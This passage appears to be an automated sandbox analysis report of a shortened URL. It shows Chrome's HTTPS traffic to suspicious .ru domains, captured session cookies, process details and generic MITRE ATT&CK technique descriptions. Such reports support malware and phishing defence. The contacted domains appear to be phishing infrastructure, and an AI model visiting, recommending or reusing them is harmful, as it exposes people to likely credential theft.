pO++oO++oOOFpOOFpOOFpO++oOOFpO++oOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oOOFpOOFpO++oOOFpO++oO++oOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++oO++oOOFpO++oO++oO++oO+
2025-03-26 17:31:22 UTC	1369	IN	Data Raw: 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 Data Ascii: OOFpO++oOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpO++oO++oO++oOOFpO++oOOFpO++oOOFpOOFpO++oO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oO++oOOFpO++oO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oOOFpO++oOOFpO++oO++oOOFpO++oO++oOOFpOOFpOOFpOOF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49730	172.64.80.1	443	1796	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-26 17:31:22 UTC	1331	OUT	GET /favicon.ico HTTP/1.1 Host: xkll.ebechlockhor.ru Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://xkll.ebechlockhor.ru/PrCq/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: XSRF-TOKEN=eyJpdiI6ImIyMkhpYjNMdE04OUdURUVjeDV6anc9PSIsInZhbHVlIjoiMTlJd3BQZGVxUjZoa25JWDc3Znp0c1lIbzBuTEtIN1NhRU5ZVnRZTHFmVnQxQXpOYVFyUHc3TGJ0ZzNXVUh5K3NsMWY5NDJGanFzbEVkdHN0UTljamwwaWZyODA1cVdpMUk4Y2FZeGlzVlNIc2lPKzJvT01QT2t0T1hGdWgwQzQiLCJtYWMiOiI4YTc4ODcyNWY5NjA1YjUzMmM3YjNlYzI5OWViYzRhMTQ4ZDJhOWVjZWQwYjM2OWJlNDk1MDc2YzI3MGUyMTA5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im9ucUc4eS9hK3NkVFYzM21BSyt3UkE9PSIsInZhbHVlIjoiQUFzMU9wb25Va0xzWGk3YTFxQVUxQzFJYXFwTEhvc3QraWYwUWw0ZklxNWk1UUZCSS9qYTFsTnNaQUF4NkpUODJ5MDNWbVZERmxkSGpkdlBrV2I2Qi8xOXh5d0RId3NxZ0svd0tXNmFOYW10NHlMam9GU2FzRU5teG8xZ3QwRDYiLCJtYWMiOiJlNDRjMDU2MWZkZGEyMzA1MDlhNWNmMDIxMDc1ZGFhOWY2MGUwYjMyYTRmOTdlY2JlZTNhNTIxYTdlMDcxZjlmIiwidGFnIjoiIn0%3D
2025-03-26 17:31:22 UTC	1087	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Mar 2025 17:31:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=14400 cf-cache-status: HIT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t1okB%2BhQZbfzNIlQ5F7IAU49qiaTj3ow%2FuPjpc2mw%2BfZT%2FfqqgWVXEra4pmWNdQeC3AN0oJFjDJdvXrwIHDN8yy2NMmgcUCoU7V4Ovx9kFzRDsJ169lHA4t2%2B2JCaw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=16819&min_rtt=4363&rtt_var=22199&sent=415&recv=163&lost=0&retrans=11&sent_bytes=502065&recv_bytes=32671&delivery_rate=3138868&cwnd=257&unsent_bytes=0&cid=edbcee927d75a18d&ts=543618&x=0" Age: 8735 Server: cloudflare CF-RAY: 9268619bbb930f70-EWR server-timing: cfL4;desc="?proto=TCP&rtt=85573&min_rtt=85515&rtt_var=18091&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1903&delivery_rate=35680&cwnd=252&unsent_bytes=0&cid=e02a54deddeb2b5d&ts=197&x=0"
2025-03-26 17:31:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49735	35.190.80.1	443	1796	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-26 17:31:23 UTC	549	OUT	OPTIONS /report/v4?s=t1okB%2BhQZbfzNIlQ5F7IAU49qiaTj3ow%2FuPjpc2mw%2BfZT%2FfqqgWVXEra4pmWNdQeC3AN0oJFjDJdvXrwIHDN8yy2NMmgcUCoU7V4Ovx9kFzRDsJ169lHA4t2%2B2JCaw%3D%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Origin: https://xkll.ebechlockhor.ru Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-26 17:31:23 UTC	336	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-max-age: 86400 access-control-allow-methods: POST, OPTIONS access-control-allow-origin: * access-control-allow-headers: content-length, content-type date: Wed, 26 Mar 2025 17:31:23 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49736	35.190.80.1	443	1796	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-26 17:31:23 UTC	524	OUT	POST /report/v4?s=t1okB%2BhQZbfzNIlQ5F7IAU49qiaTj3ow%2FuPjpc2mw%2BfZT%2FfqqgWVXEra4pmWNdQeC3AN0oJFjDJdvXrwIHDN8yy2NMmgcUCoU7V4Ovx9kFzRDsJ169lHA4t2%2B2JCaw%3D%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Content-Length: 433 Content-Type: application/reports+json Origin: https://xkll.ebechlockhor.ru User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-26 17:31:23 UTC	433	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 37 32 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 78 6b 6c 6c 2e 65 62 65 63 68 6c 6f 63 6b 68 6f 72 2e 72 75 2f 50 72 43 71 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 34 2e 38 30 2e 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 Data Ascii: [{"age":0,"body":{"elapsed_time":372,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://xkll.ebechlockhor.ru/PrCq/","sampling_fraction":1.0,"server_ip":"172.64.80.1","status_code":404,"type":"http.error"},"type":"network-error"
2025-03-26 17:31:23 UTC	214	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-allow-origin: * vary: Origin date: Wed, 26 Mar 2025 17:31:23 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49743	104.21.95.206	443	1796	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-26 17:31:31 UTC	573	OUT	GET /chiriya$8mxr1j1 HTTP/1.1 Host: vu1.viugbu.ru Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Origin: https://xkll.ebechlockhor.ru Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://xkll.ebechlockhor.ru/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-26 17:31:32 UTC	820	IN	HTTP/1.1 200 OK Date: Wed, 26 Mar 2025 17:31:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fq%2FfCkM8ITW3W6k0Ij%2FoG1B46wkfVqApwoc1BlETPZinDod%2FdJ3ZKMvOvZsJoM5JYOmaO1rPs88Df07itWsVINM30QCJNnN0euD%2FxE3PeliVe%2F019hJ5TI64gO9KFDC6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 926861d1eed61895-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=86963&min_rtt=85059&rtt_var=19946&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1145&delivery_rate=35934&cwnd=252&unsent_bytes=0&cid=56f6491b8736f61f&ts=793&x=0"
2025-03-26 17:31:32 UTC	6	IN	Data Raw: 31 0d 0a 31 0d 0a Data Ascii: 11
2025-03-26 17:31:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49744	104.21.95.206	443	1796	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-26 17:31:32 UTC	392	OUT	GET /chiriya$8mxr1j1 HTTP/1.1 Host: vu1.viugbu.ru Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-26 17:31:33 UTC	815	IN	HTTP/1.1 200 OK Date: Wed, 26 Mar 2025 17:31:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KOwR5dwGOT3ryrA%2BvBj9M6F%2FO8%2BGoaxPSdhtIeguhUViKin5R1oIRETCO0TInSS9fsM1fK9vBU0JdUQGQPVmYuSF7s75fDGCdTjzrW1q6Je0cs0YBbzc5JwhqMi5jKNa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 926861d8893178d6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=86300&min_rtt=85260&rtt_var=19071&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=964&delivery_rate=35845&cwnd=252&unsent_bytes=0&cid=951ddb7f450513a8&ts=824&x=0"
2025-03-26 17:31:33 UTC	6	IN	Data Raw: 31 0d 0a 31 0d 0a Data Ascii: 11
2025-03-26 17:31:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49745	104.21.95.206	443	1796	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-26 17:31:39 UTC	573	OUT	GET /chiriya$8mxr1j1 HTTP/1.1 Host: vu1.viugbu.ru Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Origin: https://xkll.ebechlockhor.ru Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://xkll.ebechlockhor.ru/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-26 17:31:40 UTC	816	IN	HTTP/1.1 200 OK Date: Wed, 26 Mar 2025 17:31:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pUFESDHA9%2B%2BKegwfheVmfvZtintdsxOU9qqI52DQ36Tsl%2BzEMmS3H4tagh89AB8HXBxsw3XLYnuBIFIaBbHgZfaaAgiw06Eaz5DJ4JlMNZ0yp0MPtRyhuh0ZHxM9kzX9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 92686206da3cef9d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=85251&min_rtt=85215&rtt_var=18000&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2819&recv_bytes=1145&delivery_rate=35854&cwnd=252&unsent_bytes=0&cid=58e9de08e2938bb9&ts=885&x=0"
2025-03-26 17:31:40 UTC	6	IN	Data Raw: 31 0d 0a 31 0d 0a Data Ascii: 11
2025-03-26 17:31:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49746	104.21.95.206	443	1796	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-26 17:31:40 UTC	392	OUT	GET /chiriya$8mxr1j1 HTTP/1.1 Host: vu1.viugbu.ru Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-26 17:31:41 UTC	819	IN	HTTP/1.1 200 OK Date: Wed, 26 Mar 2025 17:31:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IFmOWxlkHq9Dm4aOYiT64lwIJJh3BYlfNckD%2FXvfMFve220bHSMwmzvaKp18kB%2ByFjrJ6JQ2Yg%2BgV2B3vgJU43DDmUWDHjR%2BBPMvOrPnPukmjMxgLAhRQrCNy%2B5d0m0g"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9268620d8fc27ca2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=85805&min_rtt=85180&rtt_var=18910&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2818&recv_bytes=964&delivery_rate=35102&cwnd=252&unsent_bytes=0&cid=d30953ae60cf2404&ts=791&x=0"
2025-03-26 17:31:41 UTC	6	IN	Data Raw: 31 0d 0a 31 0d 0a Data Ascii: 11
2025-03-26 17:31:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49748	104.21.95.206	443	1796	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-26 17:32:07 UTC	573	OUT	GET /chiriya$8mxr1j1 HTTP/1.1 Host: vu1.viugbu.ru Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Origin: https://xkll.ebechlockhor.ru Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://xkll.ebechlockhor.ru/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-26 17:32:08 UTC	814	IN	HTTP/1.1 200 OK Date: Wed, 26 Mar 2025 17:32:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SRZRLYyu8hO1AOSGkSaVLxRMy7O3xCbsBjYaJ3epbIuE0F3842B7xyKbobtZHKY13yAF9SbUsvLt8ul%2Bom%2F98T3OTvA64sfFQERWcaqBK0mZc7IS3Dhnqkle8tt0LVhp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 926862b289ea4385-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=86245&min_rtt=84899&rtt_var=19298&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2819&recv_bytes=1145&delivery_rate=35986&cwnd=252&unsent_bytes=0&cid=5133840d651712e7&ts=939&x=0"
2025-03-26 17:32:08 UTC	6	IN	Data Raw: 31 0d 0a 31 0d 0a Data Ascii: 11
2025-03-26 17:32:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49749	104.21.95.206	443	1796	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-26 17:32:08 UTC	392	OUT	GET /chiriya$8mxr1j1 HTTP/1.1 Host: vu1.viugbu.ru Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-26 17:32:09 UTC	813	IN	HTTP/1.1 200 OK Date: Wed, 26 Mar 2025 17:32:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KOnVV6aZ0ZmS30yTJVo30sWnMKMHw3Eg6gZ2NULrV1RPw3vK3WKTn85UgXEAN%2FvtvA%2B59VarQ8KyEcrbN0dSTtpZPLJqQAFXNZVNIUwFNr2HqfguZimlQPu7iK8QBIny"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 926862b9899ad123-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=86689&min_rtt=85716&rtt_var=19100&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2819&recv_bytes=964&delivery_rate=35657&cwnd=252&unsent_bytes=0&cid=b87380786d942e58&ts=812&x=0"
2025-03-26 17:32:09 UTC	6	IN	Data Raw: 31 0d 0a 31 0d 0a Data Ascii: 11
2025-03-26 17:32:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Statistics

CPU Usage

• chrome.exe
• chrome.exe
• chrome.exe

Click to jump to process

Memory Usage

• chrome.exe
• chrome.exe
• chrome.exe

Click to jump to process

Click to jump to process

Target ID:	1
Start time:	13:31:08
Start date:	26/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff786830000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	13:31:12
Start date:	26/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=3448,i,5827661054831206110,7969331695241214273,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=3740 /prefetch:3
Imagebase:	0x7ff786830000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	13:31:17
Start date:	26/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://s.id/gQtbn"
Imagebase:	0x7ff786830000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://s.id/gQtbn

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Malware Analysis System Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 51

Chrome Cache Entry: 52

Chrome Cache Entry: 53

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 5672, Parent PID: 3708

General

File Activities

File Opened

File Created

File Deleted

File Moved

